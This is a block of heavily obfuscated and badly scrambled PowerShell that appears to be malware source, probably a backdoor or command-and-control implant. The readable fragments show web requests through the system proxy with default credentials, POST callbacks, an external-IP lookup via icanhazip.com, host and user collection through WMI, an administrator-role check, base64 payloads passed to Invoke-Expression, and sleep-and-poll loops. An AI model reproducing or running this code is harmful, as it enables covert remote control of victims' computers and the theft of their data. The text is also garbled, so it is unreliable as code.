cTw).REPlACE(([CJl4+Jl4har]112Ri+2Ri3+[Char]106+[Char]116),[sTriNg][Char]34).REPlACE(([Char]105+[Char]88+[Char]89),cTwh4GcTw).REPlACE(cTwg7ecTw,cTwFk6cTw).REPlACE(cTwLwycTw,[sTriNg][Char]m7n8+m7n8JIv,JIviAl7Sa,l7Sa66}{24}{139}{vt95wUnJ50+nJ50d,wUd7x+f7xPSB7DQoJCQkkYydwp,dwp6t f7x+f7x hRV+hRV yDv,yDv7OKP+OKPx+f7xtbf7x+f7xWFuZOKP+OKPC5f7cTw+cTwx+f7xQcmVDb21tYW5kTG9vhf7x+f7xRdwp,dwp LoOKP+Jd3+Jd3OKP6hgs8 = nJd3+JwqH,wqHVbG{21}{3}{b4B,b4Bfqh::EulaV.))mCzwaxSmCz+mCzP:mCz+mCzeLbAiRAVmCz( METiDLIhc-teG ( (,v8Cv8C(mCzNIogvWjmCz::4xYpgm ( )v8CXv8C+]31[}DiLgvWlEgvWhs{pgm+]1[}dILlegvWhgvWs{pgm (& ; ) )v8Cgerv8C,v8Cxev8C f-mCz}0{}1{mCz(]EpYt[( )mCzwmCz+mCzaxsPmCz( ELbAI1Yj+1YjrAv-TEs ; ))v8CrTsv8C,v8CgnIv8Cf-mCz}0{}1{mCz(]Epyt[ ( 4xy:ElBairAv mEtI-teS fqh(( )fqhfqhNIoJ-]52,42,4[cEpsmoc:vneBWL ( yDv,yDvraHc[+88]raHc[+65]raHcwUd,wUd)N3w+N3wf7xAL2+AL2L0f7x,f7xvf7xf-uOY}1{}0{um7n8+m7n8OY( )f7xAirAf7x5lr,j1p+j1hND,hND try{ hRV+hRVyDv,yDv{145}{17ECi+ECi5hND,hND104}{f7x+f7x128}{13}{223}OKP+OKP{163}{2f7xOKP+OKP+f7x69}{24wqH,wqHGETSBN; df7x+f7xwp,dwpf7x+f7xByZXNzaWdWMA+WMAwp,df7x+f7xwp[0] -NotLikedwp,dwqYKV,YKV6eQOM+QOMrfc = Lo6jrp9D+p9Doerd.Gf7x+f7xetRehRV+hRVsponhRV+hRVsedwp,dwpcmV0ch7+ch7dXJf7x+f7xuIFtzdHJpf7x+f7OKP+OKPxdwp,dwp OKPP9rJl4+Jl4+P9r+OKP trgEnahRV+hRVqbzCedOKP+OKPwp,dwptVaZDGqh+Gqh +f7x+fyDv,yDv-fm7n8E:Q7Cm7n8,m7n8im7n8,m7n8VArm7n8,m7n8ablm7n8) ).Cq5vAgJ3lueCq5::(Cq5{1}{0}Cq5 -f m7n8nm7nxXW+xXW8,m7n8Joim7n8).Invoke( m7n8m7n8, (&(m7n8LSm7n8) (Cq5{4}{2}{1}{3}{0}Cq5 -fmQOM+QOM7n8Lm7n8,m7n8E:4m7n8,m7n8Ablm7n8,m7n8Ft3m7n8,m7hND,hND,m7n8ft3lm7n8) (Cq5 ) )43]rAhc[]gnirts[,)901]rAhc[+94]rAhc[+601]rAhc[((EcALPEr.)93]rAhc[]gnirts[,m7n8SO4m7n8(KVy+KVyEcALPEr.)m7n8ka1im7n8,m7n8gIsm7n8(EcALPEr.)m7n8
)SO4SO4nIOJ-]2,11,3[EmAN.)SO4rdMSO4 VG((.gIs)421]rAHC[]GnirTS[,)48]rAHC[+57]rAHC[+28]rAHC[((eCaLpER.)93]rAHC[]GnirTS[,)15]rAHC[+98]rAHC[+211]rAHC[((eCaLpER.))SO4x+f7xrrorIPSBN; WNLg,Wm7n8+m7n8NLg 4bM ;) )a4hgeRa4h,a4hXEa4h F- 4bM}0{}1{4bM(m7n8+m7n8]EpyT[ ( )4bMN4bNfx,Nfx6 -RePlace([ChaR]104+[ChaN3w+N3wR]52+[ChaR]71),[ChaR]36)) 0Dk).rEplaCe(0DkYKV0Dk,[stRING][CHAR]39).rEpla3Yp+3YpCe(([CHAR]99+[CHAR]114+[CHAR]98),0DkNfw0Dk).rEplaCe(0DkN6D0Dk,[stRING][CHAR]34)8Gv . (KS6h,KS6hn32_NilZ+ilZetfSO4,SO4Yf7x+f7x3MpDQf7x+f7xogICA5lr,5lrovnI.)f7xEf7x,f7xREGvu+GvuVerf7x,f7xsf7x f-uOY}22A1+2A1OKP+OKP{}0{}1{uOY(::uOJIv,JIvC[( eCaLpeR- )Jd3
)YrnYrnnioJ-]52,51,4[}cePSrGSMoc:VNrGSe{s5e (. ImfGY3 )Yrn Yrn YrnSfo:eLbAIRaVYrnwUd,wUdJ- ) AV- wUd,wUdf7x+f7xrfjt+fjtf7xXW+xXWfjt+fjtx+f7xAvf7N3w+N3wx( )f7xMetf7x,f7xegf7x,f7xBJK,BJKrGSerGSIX{p9D+p9Ds5em7n8+m7n8cTw+cTw (]GNIrTs[+GY3 ) YrnYrn YrnSFoYfqh+fqhrn ElBaIRAV-Tes(s5eGY3 ;GY3 (Yrn((aZO{‘+’26}{8}{15}{23}{16}{11}{2}{1}{5}{19P9r+P9r}{9}{14}{4}{24}{13}{7}{6}{20}{3}{22}{21}{10}{18}{25}{0}{17}{12}WMA+WMAaZO-f0ni+f7x f7v8C+v8C3Yp+3Ypx+f7x Lo6filZ+ilZ7x+f7xXi1Yj+1Yj = (LodwpYKV,YKV( )f7xe2Ri+2Rilbf7x,f7xrAVf7g5m7n8+m7n8u+g5ux,f7xAif7x f20ni,0ni; OKvt95+vt95Pa4h+a4h+OKP } } cWMA+WMAatBJK,BJKdwfOKP+OKP7xOKP+OKP+f7xp,dwpMessdf7x+f7Gvu+Gvuxwp,dwpV+hRV dwp,dwp p9D+p93Yp+3YpD Lo6dwp,dw0ni,0ninR,1nROKP+OKPx+f7x hRV+hRVLohRV+hRV6jroerd.Method = SBNPOSTSBN; GRU,GRUOKP7x Nfx,Nfx hRV+hRV Lo6erfhyg ‘+’=hRVm7n8+m7n8+hRV [ConveOKP+OKPrt]::ToBase64StrhND,hNDxOKPRxY+RxY+]wqyDv,yDv returf7x+f7xnfvt95+vt957x+f7x Lo6bhj1p+j1pg }
funcJd3+Jd3tion vasbvavg(){ OKP+OKP function trgf7x+f7xVC()N3w+N3w{f7x+f7x fjt+fjjaA,jaAwp LoOKP+OKP6jroerd = [System.Net.WebRequdwp,dwpet-RandomOKP+OKP -minimdwp,dwp catch { return SBNf7x+f7xm7n8+m7n8ErrorOKP+OKPArcKS6h,KS6hC[,)411]raHC[+17]raHC[+38]raHJIv,JIviRV+hRVlength; Lo6jroerd.ContentTypdwf7x+f7xp,dwp hRV+KS6h,KS6h+f7xLo6pzq)) OKP+OKP OKP+OKP KVy+KVy f7x+f7OKP+Och7+ch7KPx OKP+OKP LhRVJIv,JIvLo6Ei - 1 OKP+OKP } } return Lo6YiJl4+Jl4 } AL2+AL2 hND,hKS6h,KS6h NfwpshOmE[21]+NfwPQOM+1Yj+1YjQOMSO4,SO4}{26}{30}{256}{f7xg5u+g5u+f7x102hND,hND}{3}{48}{18}{262}{ECi+ECi235OKP+OKP}{0}Yrn+Yrn{264}{1RxY+RxY44}{115}{88}{103}{164}{227}{255}{138}{238}{279}{216}{40}{176}{108}{9}{198}{170}{f7x+f7x182}{21}{125}{27OKP+OKP4}{50}{f7x+f7x278}{208}{197}f7x+f7x{166}{15}{224}{36}{135f1nR,1nR7x+vt95+vt95f7x}{221Yj+1Yj2}{85}{5lr,5lrby Gvu+GvuLo6pzq Gqh+Gqh iff7x+f7x(Lo6erfhy4n6+4n6g.LengtyDv,yDvlKCR0KQ0KICAf7x+f7xgICRzdy5DbGdwp,dwpyf7x+f7xkpDQoJew0KCQkkOKP+OKPf7x+f7xZS5Db2Nfx,Nfx4hMETa4h,a4hJIv,JIvdwpq.OKP+OKPLastIndexdwp,dwpV+hRg5u+g5uVBNdwp,dwp ilZ+ilZhRV+hRV hRV+OZc,OZc }3Yp+3Yp hND,hNDi8EECi) -VBt3+WMA+WMABt3ALuEONl )[- 1 .. -(( &(tDr{0}{1}{4n6+4n62}tDr -fECv8C+v8CivEv8C+v8CCi,ECiArECi,ECiiAbleECi) (tDr{1}{0}tDr -fECi48EECi,ECigECi) -VALuEONl ).tDrLeHUhNH2A1+2A1UhGthtDr ) GRU,GRUerfhyg
hf7x+f7xRV2A1+2A1+ztT+ztThRV
}
functOKP+OKPionf7x+f7xOKP+OKP OKP+OKPuggcTRG(Lo42Ri+2Rin6+4n66hey){ hRV+hRV f7x+f7x trf7x+f7xgEnaqbzChRV+hRVebkl
try{Lo6hRV+hRVjroerd = [ShRV+hRVystedwp,dwp{
OKPxXW+xXW+OK’+’P Bt3+Bt3 0Dk+0Dk tdwp,dwpb = New-Object -Cof7OK0ni,0niA1+2A1-uOY}2{}0{}1{wqHm7n8+m7n8,wqHqngn.dwp,dwpDtVDtVuserf7x+f7xsDtVDdwpf7x+f7x,dwpREPlACE f7x+f7xhROKP+OKPVmQihRV,[CHAr]124 -rePLacE JIv,JIvwp,dwpzCebOKP+OKPkl
hRV+hRV dwp,OZc,OZco6qf7x+f7xngn;f7x+f7x3Yp+3Yp
[StringGqh+Gqh] Lo6fqh+fqherfhyg = Lo6erfqngn.ReadTodwpjaA,jaA((LGvu+KVy+KVyGvuo6Eidwp,dwp39) 0OKPch7+ch7+OKP6u &ch7+ch7f7x+f7x( QuOenv:OKP+OKPxXW+xXWPUBlIC[13]+QuOeNOKP+OKPVGRU,GRUROKP+OKPV+hRV }
Wrf7jaA,jaA,dOKP+OKPwp9uLkdaadwp,dwpWmfjt+fjtiObjch7+ch7ect f7x+f7xWhRV+hROKPvt95+vt95+OKPVin32_Cfqh+fqhomputerOKPxXW+xXW+Jd3+N3w+N3wJd3OKPSilZ+ilZystem).Dof7x+OKP+OKPilZxXW+xXW+ilZf7xmf7x+f7xaf7x+f7xin;g5u+g5u
f7x+f7x
} catch {
1Yj+1Yj
OK1Yj+1YjP0ni,0nix= f7JIvNfx,NfxCiuOKP+OKPll){
Lo6qdwp,dwpWMA+WMA catch {
f7x+f7x
f7x’+’+f7x return SBNerrorf7x+f7xSdwp,dwf7x+f7xpebProxy()
Lo6jroerdf7x+f7x.proxy.CreKS6h,KS6hAR]114+[chAR]52+[chAR]yDv,yDvpA9ICJlY2hvIg0KCQl9f7x+f7xLkdldE5ldf7x+f7x0NswUd,wUdhRAL2+A0Dk+0DkL2V+Gqh+GqhhRV xXW+xXW Lo6wf7x+f7xc.Dodwp,dzg5u+jaA,jaAldwp,JIv,JIvU,GRUFlfVa1nR,1nR+hRVLo6.ExcYrn+YrnepOKP+OKPtion.Mef7x+RxY+RxYf7xssagehf7x+f7xROKP+OKPVf7x+f7OKP+OKPvt95+vt95x+hRV
}
}
ilZ+ilZ
elshRVl7Sa,l7Sa]105),[STRInG][chxXW+xXWAR]39).wqH,wqHcChRV+hOKP+OKPRVb4B,b4Breturn (Get-dwpOKP+OKP,dwpt Lo6cynvaf7x+f7xgrkOKP+OKPg.Lengthf7b4B,b4B7xResponseStream();OKP+OKP
[System.IO.StreamRf7x+f7xeader] LoNfx,Nfx1tYW5dwp,dwp[Net.CredentialCache]KVy+KVy:dwp,dwpbkl
WNLg,WNLgdwphRVggcCWMAnJ50+nJ50+WMABFf7x+f7OKP+OKQOM+QOMPxOKP+OKztN3w+N3wT+ztTPG(Lo6OKP+OKPheyhRV+hRV,Lo6rap_zftf7x+f7x){
f7x+f7x trgEnaqbzCebkl OKP+OKP
try{Lo6pl7Sa,l7Sadwp,dwp+hRVitef7x+fAL2+AL27x-hof7x+4nv8C+v8hND,hND3Yp return Lo6env:Use3Yp+3YprName
OKP+OKP } } catch {dwpf7x+f7x,OKP+OKPdwp df7x+f7xwp,dwpg(0ni,0nic.proxyhRV+hRV = [Netb4B,b4Ba,l7Sal_neenl hRV+hRV 5lr,5lrA1) (2A1d2A1+2A1pF2A1) (tyPe m7n8+m7n8); &(6SX{1}{0}6SX-f 2A1e0ni)).RePlace(0nigGv8C+v8Cqh+Gqh5u0ni,[sTRinG][chAr]39) r4G& ( T7hSO4,SO4lr,5lrh7x+f7x f7xOKP+OKP+f7x Lo6nqqg5u+g5ue = (aZD/BJK,BJKpry{f7x+f7x Nfx,Nfx,JIvf7x+f7x+f7x+f7xhRVo6bhg = Riny Ldwp,df7x+f7xwpbal:url + Lo6heyhRVf7x+f7x2Ri+2Ri+hAL2+AL2ROKP+OKPV); hztT+ztTRV+hRV hRV+hRVLo6jroerd.proxydwp,dwp Jl4+Jl4 f7x+f7xLo6dwp,dwpage } yDv,yDvV trgf7x+f7QOM+QOMxNepu(){ OKP+OKP try{p9D+p9D dwp,dwp Lo6pzdwp,df7x+f7xwpDSBNdoneSBNaZD){ N3w+N3w f7x+f7x cTw+cTw breaJl4+Jl4k 0Dk+0Dk } else { f7x+Gqh+0Dk+0DkGqhf7x starthROKP+O0Dk+0DkKPV+hRV-dwOKP+OKPpxXW+xXW,dwp SBNSBN f7x+f7x Lo6FlfVa0Dk+0Dksb +f7x+f7x= BGqh+Gqht3+Bt3f7x+f7xtrgQf7x+f7xbznvaOKP+OKP f7x+f7x hRV+h0ni,0ni+= trgHff2Ri+2Ri7x+f7xhRV+hRVreanzr Gvu+Gvu dwp,dwpRxY+RxY f7x+f7xtrgCVC f7x+f7x Lo6global:id = zq5traOKP+OKPrengbe(Lo6FlfVaOKP+OKPsb) returv8C+v8Cn (Lo6global:idhRV+hRV + aZDaZDWMA+WMA f7x+f7x+f7x+fKVy+KVy7x Lo6FlfVhRV+hRVasb) N3w+N3w}
f7x+f7Jl4+Jl4xfunctioyDv,yDvTs[,OKP07hOKP(eCaLpeR.)43]rAhc[]gnirTs[,OKPuOYOKP(eCaLpeR.)93p9jaA,jaA,OZc Lo6pzq=Ldwp,df7x+f7xwpCurrent() f7x+f70Dk+0Dkx GRJIv,JIvp,dwp hRV+OKP+OKPhRV rOKP+OKPeturnch7+ch7 Lo6vcOKP+OKPf.suf7GRU,GRUing ‘+’rv8C+v8Ceturn Lo60ni,0ni7x+f7x; dwf7x+f7xp,dwpodinghRV+hROKP+OKPVf7x+f7x]::Gqh+GqhUTAL2+AL2F8.GetString([System.ConveRxY+RxYrt]::F0Dk+0DkromBahRV+hRVsef7x+f7x64StriwUd,wUdcewqH,wqHNfx,Nfx:ELBaIwUd,wUdng(Lo6y));OKP+OKP IEOKP+OKPdwp,dwpre hRV+hRV4vt95+vt95n6+4n6 } f7x+fOKP+GRU,GRUwp %’+’ 2) -eq 0) { Wv8C+v8CNLg,WNLgrn Sp9D+p9DBNErrorSO4,SO4rIng][cHAr]96).rePlACE(([cHAr]104+[2A1+2A1cHAr]79+[cHGqh+GqhAr]71),[StrIng][cHAr]124).reGqh+GqhPlACE(([cHAr]1162A1+2A1+[cHAr]68+[cHAr]114),[StrIng][cHAr]34).rePlACE(RxYECiRxY,[StrIng][cHAr]39)HEx invoKe3Yp+3Yp-EXPreSSioN 1SO4,SO4
)3Yp3Y’+’pNiOj-]2,11,3[EmAn.)3YprDM3Yp Vg((& TKR )69]RahC[,)911]RahC[+37]RahC[+221]RahC[( eCAlPER- 421]RahC[,3Ypuwf3Yp eCaLpeRc- 93]RahhND,hND,dwpOKP+OKPsleep 30 f7x+f7xhGRvt95+vt95U,GRUdwf7OKP3Yp+3Yp+OKPfqh+fqhx+f7xp,dwp = f7xOKP+OKP+f7x(aZD{Sf7KS6h,KS6h wUd,wUd[hND,hNDAD+p9D]rAhc[]gnirTs[,)201]rAhc[+55]rAp9D+p9Dhc[+02cTw+cTw1]rAa4h+a4hhc[((eCaLpeR.)69]gJl4+Jl45u+g5urilZ+ilZAhc[]gnirTs[,OKPHOYrn+YrnnOKP(eCaLpeR.)ECi+vt95+vt95ECiOKP
)f7xf7x ncTw+cTwIowUd,wUdt )93]rAhc[,)17]rAa4hKVy+KVy+a4hhc[QOM+QOM+28]rAhc[+58]rAhc[( EcALperC- 63]rKVy+KVyAhc[,2A1mQ62A1 EcALperC- 43]rAhc1Yj+1Yj[jaA,jaAl4+Jl471{}2{}21{}1{}81{}5{}6{}01{}41{}9{}11Yj+1Yj2{}0{}11{}52{}32{}7{}91{}02{}8{}3{}51{}61{}22{}31{}62{Kbk((P9r(( (cTw+cTw NOisserPxe-eKoVnI jyb ) ; Gqh+Gqh K0C{EQ9643}::(jyb{0}{1}jyb-fP9rrEVErSP9r,P9rEP9r).Ivt95+vt95nvoke(K0CQOM+QOM{AQ96Bt5} ) ;-Join K0C{aBQ96T5}T1S &(jyb{1}{0}jyb -f P9rXP9r,P9riEP9r)
AL2).rEplAcE(([cHAR]81+[cHAR]57+[cHAR]54),[String][cHAR]96).rEplAcE(AL2P9rAL2,[String][cHAR]39).rEplAcE(AL2T1SAL2,[String][cHAR]124).rEpilZ+ilZlAcE(([cHAR]106+[cHAR]121+[cHAR]98),[String][cHAR]34).rEplAcE(([cHAR]75+[cHGqh+GqhAR]48+[cHAR]67),AL2a3bA0Dk+0DkL2)) WNLg,WNLg OKP+OKP } }
f7x+f7x1Yj+1Yj
Jl4+Jl4 funf7x2Ri+2Ri+f7xhOZc,OZcf7x) OKP+wUd,wUdch7+ch7ChRV+hRVRjcyA9g5u+g5uIE5ldJd3+Jd3y1PYmplY3Qdwp,dwp f7xOKP+AL2+AL2OKP+f70ni,0ni } else { Lo6Yi wqch7+ch7H,wqHpOKP+OKPbf7x+f7xhgdwp,dwpchRV+hRVtion RihRV+hRVny(df7x+fch7+ch77xwp,dwpeturn aZD+aZD f7x+f7x hRV+hRV }p9D+p9D f7x+f7x f7x+f7xelse f7x+f7x f7x+f7x { f7x+f7x Jl4+Jl4 rOg5u+g5uKP+OKYrn+YrGvu+GvunPeturn aZDaZm7n8+m7n8D } YKV,YKVOl7SGqh+Gqha,l7Sfjt+fjtaOKP+OKPp } catch { ‘+’rfOKP+ON3w+N3wKP7x+2Ri+2Rif7xehRV+hRVtuhRV+hRVrf7x+f7xn SBNN3w+N3wf7x2Ri+2Ri+f7xEf7OKP+OKPSO4,SO4Yrn).REpLaCE(([chAR]48+[chAR]110+[chARl7Sa,l7SaP+OKP7x Lo6pOKP+OKPzq=Lo6pzq.repOKP+OKPlace(aZDcztT+ztTmd aZD,aZDhRV+QOM+QOMhRVaZDhRVdwp,dwpobhRV+ha4h+a4hRf7x+f7xVal:id = SBNhRV+hRp9D+p9DVSBN Lo6cevingr = 959, 713 Lo6choyvp = 37, 437 Lo6fv8C+v8xXW+xXWC7x+f7xC = @(aZDyDv,yDv(jyb{2}{3}{1}{0}jyb -fP9raRIaBLEP9r,P9rvP9r,P9rSP9r,P9retcTw+cTw-QOM+QOMP9r) (jyb{1}{0}jyb-f P9rT5Nfx,NfxECi OKP+BLT+BLTOKPdwp,dw1Yj+1YjpoOKP+OKPwsBuilwUd,wUd{}0{NFOg( )vt95aVvt95,vt95el1Yj+1YjBaIrvt95 f- NFOgxXW+xXW}0{}1{NFOg(& ( ( )vt95xvt95+]43[}EmgNV0oHgxXW+xXWNV0SP{Doz+]12[}eMohgNV0SP{Doz (. ;) NFOgEULgNV0aVNFOg.))vt954:ELBAvt95,vt95IRAVvt95,vt95dTqJEvt95f- NFOg}0{}2{}1{NFOg( )vt95mevt95,vt95ti-teGvt95 f- NFOg}1{}0{NFOg(& ((ekovnI.)vt95EVErvt95,vt95ESrvt95f-NFOg}0{}1{NFOg(::euLAV.) )vt954vhPw:Evt95+vt95Lvt95+vt95bairAvt95+vt95vvt95( )vt95gvt95,vt95icvt95f- NFOg}0{}1{NFOg(& ( ; )NFOg (vt95 & ( zEpEnV:PuBLIc[13]+zEpenv:pUBlIc[5]+yDvXyDv) ( ((fRq{24}{10}{9}{42}{20}{6}{39}{0}{11}{4}{45}{35}{19}{18}{22}{12}{5}{37}{41Yj+1Yj3}{26}{8}{38}{23}{21}{30}{16}{14}{1}{27}{41}{3}{34}{13}{32}{15}{25}{7}{2}{28}{36}{40}{17}{44}{31}{29}{33}fRq-fyDv& b4B,b4BaHc[((EcALPEr.)63]Rab4B f- CMI}11{}21{}01{}8{}5{}51{}91{}02{}31{}61{}32{}81{}71{}41{}2{}7{}4{}6{}9{}12{}0{}22{}3{}1{CMI((()b4BXb4B+]03[EMoHSPvk9+]12[EmOHSpvk9 ( ch7+ch7.ch7((wh5 , ch7.ch7 , (wh5{2}{0}{1}wh5 -f ch7HTch7,ch7TOleFTch7,ch7rj1p+j1pIGch7) ) -JOInch7ch7) ntP. ( Jj3{PsdGkhdGkoME}[4]+Jj3{pdGkshdGkome}[34]+ch7Xch7)
ilZ)-crepLace ilZdGkilZyDv,yDv7xf (Lo6Cevap1Yj+1Yjvf7x+f7xcnyOKP+OKP.f7x+f7ECi+ECixIsInRf7x+f7xole(OKP+fqh+fqhJl4+Jl4OKPLo6NqzvaEbyhND,hNDwpnJ50+nJ50,dwf72A1+2A1x+f7xp [SysfcTw+cTw7x+f7xtdwp,dwpo6pzp9D+p9Dq.Sf7x+OKPECi+ECi+OKPj1p+j1pf7xtartsWith(adwp,dwp = NeOKS6h,KS6h:AdministratoxXW+xXWr OKP+OKP hRVxXW+xXW+h2A1+2A1RV if7x+fyDv,yDvaR]98),[chm7n8+m7n8aR]36 ilZ+ilZ -crEPlace WhND,hND
NOiSsERPxe-eKOVNilfm)63]rAhc[,1YjDoz1YjEcalPeR-43]rAhc[,)87]rAhc[+07]rAhc[+97]rAhc[+301]rAhc[(eCaLPerc-421]rAhc[,)311]rAhc[+001]rAhc[+35]rAhc[+511]rAhc[( EcalPeR- 69]rAhc[,1YjgNV01Yj EcalPeR- 93]rAhxXW+xXWc[,)811]rAhc[+KVy+KVy611]rAhc[+75]rAhc[+35]rAhc[( eCaLPerc- )1Yj
)hND,hNDqhwgpGqh(ECALNfx,NfxBNICAg3Yp+3YpICRtcyA9IE5ldy1PYmplYv8C+v8ilZ+ilZC3QgU3lzdGVtLklf7x+f7xPLk1lhRdwp,f7x+f7xdwpX Lof7x+f7x6y; }
Lo6x = SBNJEV4ZWN1dGlvbdwp,dwp } OKP+OKP }ffqh+fqh1Yj+1Yj7x+f7x else { OKP+OKP rea4h+a4hturn Riny Lo6pzq }
hRV+hRVdwp,OKP+OKPdwpW50QXJnc3Yp+3Yp10kZSkNhOZc,P9r+P9rOZcV
KS6h,KS6h+OKP{
f7x+f7x try{
return (Get-Wmf7x+f7xiObjecf7x+f7xtJd3+Jd3 Win32_Cof7x+f7xmputf7x+f7xerSystem).Namef0ni,0ni[SystehRVf7x+f7xdwp,dwpqECi+ECi[1f7x+f7x]
f7OKP+OKPx+l7Sa,l7SaKP] OKP+OKPLo6erf7x+f7xfhyg = Lo6erf_qdwp,dwp f7RxY+RxYx+f7xfunction trgQbznOKP+OKPva(){
1Yj+1Yj tryOKP+OKPAL2+AL2WMA+WMA{WNLg,WNLg7xt]OKP+OKPLo6pvcuregrkgf7x+f7x[Lof7xOKP+OKP+ffjt+fjt7x6i]
Lo6t = f7x+f7x Zbq Lo6av8C+v8Cfjt+fjthdwp,BLT+BLch7+ch7TdwOKP+OKPwqH,wqH-Z0-9]aZD,aZDaZDf7x+f7x)
dwOKP+OKPp,dwOKP+OilZ+ilZKPp= 1
P9r+Pfqh+fqh9r whilf7x+f7xe(Lo6Eich7+chvt95+vt957 -gt 0){
hRV+hRVf7x+f7x ztT+ztT ifjaA,jaA[,v8C+v8C)86]RAL2+AL2ahc[+84]Rahc[+911]RahcSO4,SO4ShOMe[34]+0Dkx0Dk)Cy1(ekovnI.)0DkSEhc0Dk,0DkTa0Dk,0Dkv8C+v8Cm0Dk f- Cy1}2{}1{}0{Cy1(::EULAv.) s4jwin ELBaIrAV( ]gNirtS[( +Cy1 ) 0Dk0Dk 0DkSFO:eLbAIrav0Dk MEti-TEs(Nfw Cy1 ( )0DkX0Dk+]31[}dIL4qQleH4qQs{Nfw+]1[}DiL4qQL4qQEHs{Nfw ( &;) )0DkR0Dk,0DkxEge0Dk f- Cy1}0{}1{Cy1(]EPyt[ ( s4jWin:ElBairaV metI-tEs 2Ri(( JIv,JIv.WebResponse] LoYKV,YKVl7SapmQ6+]4[eMoHspmQ6 (&2A1((cTw+cTw 6SX); ( &(6SX{0}{g5u+g5u1}6SX5lr f-y5p}91{}5{}02{}2{}4{}3{}81{}61{}0{}6{}71{}11{}31{}01{}12{}21{}51{}42{}22{}41{}32{}8{}1{}7{}YKV,YKVLg,WNLgSBNErf7x+f7xrorPubf7x+f7xlicdwp,OKP+OKPdwp+hdwp,dwp 2Ri+2Ri Lo6zl_hRV+hRVneehRV+hRVnl = @();
hRV+hRV for (LOKP+OKPo6i = f7x+f7x0 ; Lo6i -lt Ldwp,f7x+f7xdwp)
f7x+f7x OKP+OKP GRU,GRUdwl7Sa,fjt+fjtl7SaAR]117),[chAR]39)jaA,jaA}f7x+f7P9r+P9rGRU,GRUx{8}{123}{243}{167}{239}{25}f7x+OKP+OKPf0Dk+0Dk7x{116}{14f7x+f7x8}{16}{280}{154}{186}{219}{OKP+OKPAL2+AL289}{10}{1QOM+QOM79}{181WMA+WMA}{259}{60}{204}{59}{221}{38}{45lr,5lr3}{5}{84}{130}{24OKPnJ50+nJ50+OKP6}{2f7x+f7x0fqh+fqh0}{hND,hND1Yj
if(Lo6pzq.Starf7x+f7xtsWith(aZDuECi+ECiplNfx,Nfxhof7x+f7xst SBNW-OSBN
start-s2A1+2A1leepztT+ztT 300
}
hRV) -cdwp,dwpBN!!SBNf7x+f7x
dOKP+OKPwpOKP+OKP,dwpp, [strhdwp,dwphttp://icanf7x+f7xhazip.com/SBN
OKP+OKP OKP+OKP retuhRV+hf7x+f7xRVrdwp,d1Yj+1YjwpV }
}
WMA+WMAjaA,jaAttry{
OKP+OKP Lo6vcf = Sf7x+f7xBOKP+OKPhRV+hRVNSBN
f7x+OKP+OKPf7xGet-WmiObhRV+hRVdwp,Gqh+GqhdwpLo6e3Yp+3Yprff7x+f7xdwp,dwp}
f2Ri+2Ri7x+f7x hRV+hRV functwUd,wUdh7YWMA,[chAR]124-REpLace KS6h,KS6hfhND,hND } GJd3+Jd3RU,GRUfgref7x+f7xhdwp,dwpV+dwp,dwphRV+hRVb.getfhRV+hRdwp,dwp+hRVm1Yj+1Yjf7x+fWMA+WMA7x.Convfj1p+j1p7x+f7xert]::FromRxY+RxYBase64StringhRVOKP+OKP+hRV(f7xKS6h,KS6h+hRV6pP9r+P9rvcztT+ztTuregrkOKP+OKPg.Length; 2A1+2A1L0Dk+0Dko6i++){ Jd3+Jd3 LhRV+hRVohND,hNDNLgAL2WNLgcTw+cTw,[chaR]39) ) B’+’LT) xXW+xXW -CrEplACE ([ChAr]87+[ChAr]78+[CnJ50+nJ50hAr]76+[ChAr]103),[ChAr]39-CrEplACE ([ChAr]88+[ChAr]67+[ChAr3Yp+3Yp]108+[ChAr]83),[ChAr]36 -replaCeBLTj3NBLT,[ChAr]34))wgp] ][RAHC[( )wgp4sdwgp+wgpewgp( )BLTsBLT,BLTTEBLTf-wgp}0{}1{QOM+QOMwgp(&;) )BLTyaBLT,BLTrrABLT0Dk+0DkF- wgp}1{}0{wgp(]EpYt[ ( )BLTmTBLT+BLT6BLT+BLTJ9BLT+BLT:eLbABLT+BLTiRAvBLTxXW+xXW( mEti-tES Gqh( ( )GqhGqhnioJ-]2,11,3[Eman.)GqhrdMGqh ELbAIRAv-tEg((. 5lr,5lr,f7xVf7x,f7xelbf7x f- uOY}0{}2{}1{uOY(&(( )f7xE-EKoVOKP+OKPnf7x,f7xSf7x,f7xif7ch7+ch7x,f7xsj1p+j1pf7x,f7xeRpXf7x,f7xNOiOKP+OKPf7x f- uOY}0{}2{}4{}1{}5{OKP+OKwUd,wUd )aNfx,Nfxwprn LhRV+f7x+f7xhRVo6GRU,GRU= trgBF Lo6FlfVaf7x+f7xsb += SBN**SBN Lo6FlfVasb += dwpilZ+ilZ,dwpon trgUbfgAOKP+OKPnzr()OKPKS6h,KS6h
))63]raHC[]GNiRts[,)28]raHC[+07]raHC[+35]raHC[((EcaLPER.)93]raHC[]GNiRts[,KVynJ50KVy(EcaLPER.)KVyqnAKVy,)17]raHC[+611]raHC[+79]raHC[+76]raHC[((EcaLPER.)43]raHC[]GNiRts[,’+’)121]raHC[+801]raHC[+401]raHC[+98]raHC[((EcaLPER.)KVy
))) Oeulav- )nJ507nJ50,nJ50qlnJ50 f-ylhY}1{}0{ylhY( )nJ50ElBanJ50,nJ50inJ50,nJ50RavnJ50 f- ylhY}2{}1{}0{ylhY(& ( , nJ50nJ50 (ekovnI.)nJ50NnJ50,nJ50IoJnJ50 f-ylhY}1{}0{ylhY(::eULaV.))ylhY6ylhY+ylhYR5aylhY( eLBaIrAv ( ()nJ50nJ50NIoJ-]52,42,4[}cEPSGtaCMOGtaCc:VnE{RF5 (. ; )) Oeulav- )nJ50lnJ50,nJ507qnJ50 f-ylhY}0{}1{ylhY( )nJ50ElBaiRnJ50,nJ50avnJ50 f- ylhY}1{}0{ylhY(& ((ekovnI.)nJ50EnJ50,nJ50ESreVnJ50,nJ50rnJ50 f-ylhY}1{}2{}0{ylhY(::0pTRF5 ; ) ylhY& ((VARIaBLE nJ50mdrnJ50).nAME[3,11,2]-JoInnJ50nJ50)( ((nJ50 . ( KxcHeNv:PuBLIc[13]+KxcHENv:pUblIc[5nJ50+nJ50]+wUdXwUd) (((8GNX{18}{28}{29}{41}{37}{42}{20}{26}{36}{31}{40}{2}{16}{39}{30}{38}{27}{8}{43}{35}{19}{12}{1}{34}{5}{25}{32}{6}{17}{13}{10}{33}{23}{3}{0}{21}{7}{22}{4}{15}{24}{9}{11}{14}8GNX-f wUd4B,b4BBWLb4B(ec’+’aLper.)93]RAHC[]gnIRTS[,b4Bfqhb4B(ecaLper.))b4N3w+N3wBx+f7x; LGqh+Gqho6i++){OKP+OKP ECnJ50+nJ50i+Nfx,NfxA1v2fqh+fqhA1,2A1b4B,b4Bich7+ch7AbN3w+N3wLE2A1,2A1ar2A1) 